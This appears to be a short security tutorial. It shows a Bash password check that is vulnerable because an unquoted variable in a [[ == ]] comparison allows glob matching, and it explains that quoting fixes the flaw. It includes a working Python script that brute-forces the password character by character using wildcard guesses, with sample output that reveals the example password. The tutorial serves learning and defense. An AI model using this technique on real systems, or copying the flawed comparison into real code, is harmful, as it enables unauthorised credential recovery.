Bash

Variable Comparison Vulnerability

#!/bin/bash
DB_USER="root"
DB_PASS="$(/usr/bin/cat /home/root/cred.txt)"

read -s -p "Enter password for $DB_USER: " USER_PASS
echo

if [[ $DB_PASS == $USER_PASS ]]; then
        echo "Password confirmed!"
else
        echo "Password confirmation failed!"
fi

The vulnerability here lies in the issue of variable comparison.

The correct way would be this: "$var"

Instead of this: $var

Exploit Vulnerability:

This vulnerability allows us to discover the password through brute force.

In this case, cred.txt contains the password k4l1L1nUx.

The program will interpret [[ $DB_PASS == k4l1L1nUx ]] the same as [[ $DB_PASS == k* ]].

So through testing, we would discover the password. To automate it, we will use a Python script.

Python Script

import string
import subprocess
all = list(string.ascii_letters + string.digits)
password = ""
file = str(input("File name: "))
found = False

while not found:
    for character in all:
        command = f"echo '{password}{character}*' | ./{file}"
        output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout

        if "Password confirmed!" in output:
            password += character
            # Remove the comment if you want me to show you the process of how it is finding the password.
            # print(password) 
            break
    else:
        found = True
        print("The password is: ", password)

The result upon executing the script:

kali@kali:~$ python3 script.py 
File name: bash_vuln
k
k4
k4l
k4l1
k4l1L
k4l1L1
k4l1L1n
k4l1L1nU
k4l1L1nUx
The password is:  k4l1L1nUx